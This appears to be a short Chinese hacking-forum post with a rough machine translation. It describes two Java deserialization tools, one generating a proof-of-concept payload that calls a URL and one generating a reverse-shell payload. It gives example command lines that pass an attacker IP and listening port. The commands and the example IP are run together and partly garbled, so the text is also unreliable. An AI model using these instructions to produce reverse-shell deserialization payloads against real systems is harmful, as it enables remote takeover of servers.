52ky 发表于 2022-10-11 13:26:39

Java反序列化生成Payload

Java反序列化生成Payload,可反弹shell和测试POC。用法如下:Java环境自行安装生成测试Payloadjava-jarmakepoc.jar恳求的URLpayload名如:java-jarmakepoc.jarheysec.org/xxooxxooxxoo.txtD:\\java\\shellpayload生成反弹shelljava-jarmakeshell.jar你的IP监听端口payload名如:java-jarmakeshell.jar202.112.221.328888D:\\java\\shellpayload

(Java deserialization generates Payload, which can rebound the shell and test POC. The usage is as follows: The Java environment installs and generates the test Payloadjava jarmakepoc. jar requested URL Payload name, such as: java jarmakepoc. jarheysec. org/xxooxxooxxooxxoo. txt D:   java   shellpayload generates bounce shelljava jarmakeshell.jar Your IP listening port Payload name, such as: java jarmakeshell. jar 202.112.221.32888D:   java   shellpayload)




页: [1]
查看完整版本: Java反序列化生成Payload